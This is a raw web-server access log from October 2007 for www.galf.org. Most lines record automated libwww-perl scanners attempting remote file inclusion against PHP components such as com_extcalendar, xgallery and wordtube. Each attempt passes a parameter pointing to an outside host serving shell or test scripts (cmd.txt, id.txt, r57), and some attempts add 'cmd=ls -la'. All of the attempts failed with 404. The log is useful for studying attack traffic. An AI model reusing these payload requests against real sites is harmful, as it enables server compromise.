68.187.13.26 - - [15/Oct/2007:12:47:22 -0700] "GET /logs/access_071001.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:47:24 -0700] "GET /logs/access_070826.log/newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:47:33 -0700] "GET /logs/access_071001.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:47:37 -0700] "GET /logs/access_070917.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.131.228 - - [15/Oct/2007:12:47:52 -0700] "GET /logs/access.log/modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.19.131.228 - - [15/Oct/2007:12:47:53 -0700] "GET /modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.228 - - [15/Oct/2007:12:47:53 -0700] "GET /logs/modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:48:52 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:48:52 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:48:56 -0700] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:48:56 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:49:02 -0700] "GET /logs/access_070827.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:49:58 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:49:59 -0700] "GET /newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:49:59 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.104.47.74 - - [15/Oct/2007:12:49:59 -0700] "GET /newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.59.185.50 - - [15/Oct/2007:12:50:25 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:50:25 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:50:31 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:50:31 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:51:01 -0700] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:51:01 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:51:01 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.161.14.145 - - [15/Oct/2007:12:51:02 -0700] "GET /logs/access_070827.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
80.74.144.87 - - [15/Oct/2007:12:52:49 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:52:49 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:54:27 -0700] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:54:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.59.185.50 - - [15/Oct/2007:12:54:27 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:54:28 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.198.145 - - [15/Oct/2007:12:54:29 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
193.202.63.86 - - [15/Oct/2007:12:54:49 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.202.63.86 - - [15/Oct/2007:12:54:49 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.202.63.86 - - [15/Oct/2007:12:54:50 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:56:56 -0700] "GET /logs/access_070618.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:57:58 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:16 -0700] "GET /logs/index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:16 -0700] "GET /index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:17 -0700] "GET /logs/index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:17 -0700] "GET /index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:52 -0700] "GET /logs/access_070813.log/index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.208.58.8 - - [15/Oct/2007:12:58:52 -0700] "GET /logs/access_070723.log/index2.php?url_page=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:59:04 -0700] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:59:08 -0700] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:59:08 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:59:08 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:59:32 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:59:32 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:13:00:33 -0700] "GET /logs/access_070903.log/newspublish/include.php?path[docroot]=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
219.106.247.168 - - [15/Oct/2007:13:01:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://free.7host07.com/stuff/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.106.247.168 - - [15/Oct/2007:13:01:32 -0700] "GET //skin/zero_vote/error.php?dir=http://free.7host07.com/stuff/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.106.247.168 - - [15/Oct/2007:13:01:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://free.7host07.com/stuff/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
219.106.247.168 - - [15/Oct/2007:13:01:33 -0700] "GET //skin/zero_vote/error.php?dir=http://free.7host07.com/stuff/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
216.104.47.74 - - [15/Oct/2007:13:01:50 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:13:01:50 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:13:02:11 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:13:02:12 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:13:02:56 -0700] "GET /logs/scripts.log//mambots/*.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:13:02:56 -0700] "GET //mambots/*.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:13:02:57 -0700] "GET /logs//mambots/*.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:13:04:16 -0700] "GET /include.phppath[docroot]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:13:05:18 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:13:05:18 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.202.63.86 - - [15/Oct/2007:13:06:03 -0700] "GET /logs/access_070917.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:13:07:14 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:13:08:23 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:13:08:24 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:13:08:24 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:13:08:24 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:13:08:25 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.37.230 - - [15/Oct/2007:13:08:25 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:11:20 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:11:20 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.192.213 - - [15/Oct/2007:13:13:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.192.213 - - [15/Oct/2007:13:13:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.169.94.10 - - [15/Oct/2007:13:14:37 -0700] "GET /logs/access_070514.log HTTP/1.1" 200 248063 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
82.169.94.10 - - [15/Oct/2007:13:14:38 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
209.40.192.219 - - [15/Oct/2007:13:16:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:16:55 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:16:55 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:16:56 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:17:01 -0700] "GET /logs/access_070917.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.40.192.219 - - [15/Oct/2007:13:17:28 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:13:20:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:13:20:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:13:25:26 -0700] "GET /logs/access_070924.log/include.phppath[docroot]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:13:25:27 -0700] "GET /logs/include.phppath[docroot]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:26:50 -0700] "GET /logs/access.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:26:51 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:26:51 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:27:12 -0700] "GET /logs/access_070917.log/modules/vwar/admin/admin.php?vwar_root=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:27:13 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:27:14 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:13:27:38 -0700] "GET /logs/access_070826.log/include.phppath[docroot]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.177.16.31 - - [15/Oct/2007:13:28:39 -0700] "GET /logs/access.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.177.16.31 - - [15/Oct/2007:13:28:39 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.177.16.31 - - [15/Oct/2007:13:28:40 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.57.207 - - [15/Oct/2007:13:29:21 -0700] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.84.103.42 - - [15/Oct/2007:13:29:29 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [15/Oct/2007:13:29:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [15/Oct/2007:13:29:30 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.171.255.5 - - [15/Oct/2007:13:29:31 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:13:30:12 -0700] "GET /modules/My_eGallery/index.php?basepath=http://markzware.3f8h.net/skins/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.177.16.31 - - [15/Oct/2007:13:30:31 -0700] "GET /logs/access_070730.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.khabox.net/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:13:30:34 -0700] "GET /logs/access_070826.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:13:30:40 -0700] "GET /logs/access_070826.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:33:04 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:33:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:33:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:13:33:05 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:13:33:21 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:13:33:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:13:33:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.80.16 - - [15/Oct/2007:13:33:23 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.80.16 - - [15/Oct/2007:13:33:23 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.86.80.16 - - [15/Oct/2007:13:33:24 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:32 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.155.104.239 - - [15/Oct/2007:13:34:33 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
